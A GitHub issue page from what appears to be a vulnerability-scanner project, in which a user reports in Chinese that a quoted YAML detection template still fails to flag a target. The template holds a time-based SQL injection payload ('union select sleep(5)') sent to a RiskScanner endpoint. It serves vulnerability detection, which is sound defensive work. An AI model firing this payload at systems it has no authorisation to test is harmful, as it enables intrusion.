Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Poc目录里搜索 sleep有例子。 更换了条件 还是检测不到 #375

Open
chz2008 opened this issue Aug 29, 2024 · 0 comments
Open

Comments

@chz2008
Copy link

chz2008 commented Aug 29, 2024

          Poc目录里搜索 sleep有例子。
name: riskscanner-list-sqli
rules:
  - method: POST
    path: /resource/list/1/10
    headers:
      Content-Type: application/json;charset=UTF-8
    body: "\
    {\"sort\":\"1)a union select sleep(5) -- -\"}\r\n\
    "
    expression: |
      response.status == 200 &&  response.duration >= 5.0

Originally posted by @shadow1ng in #370 (comment)

更换了 还是检测不到

@chz2008 chz2008 changed the title Poc目录里搜索 sleep有例子。 Poc目录里搜索 sleep有例子。 更换了条件 还是检测不到 Aug 29, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant